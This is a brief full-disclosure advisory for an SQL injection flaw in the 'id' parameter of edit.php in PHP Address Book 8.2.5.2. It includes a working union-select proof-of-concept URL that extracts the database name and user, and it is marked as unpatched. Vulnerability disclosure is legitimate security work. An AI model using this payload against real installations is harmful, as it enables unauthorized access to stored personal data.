PHP Address Book 8.2.5.2 SQL Injection

`## Full Disclosure  
  
#Exploit Title : PHP Address Book SQL Injection Vulnerability  
#Exploit Author : Rahul Pratap Singh  
#Date : 14/Nov/2015  
#Home Page Link : http://sourceforge.net/projects/php-addressbook/  
#Blog Url : 0x62626262.wordpress.com  
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94  
#Status : Not Patched  
  
1. Description  
  
"id" field in edit.php is not properly sanitized, that leads to SQL  
Injection Vulnerability.  
  
2. Proof of Concept  
  
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union  
select  
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+  
  
## Vendor Response  
  
No reply from vendor  
  
`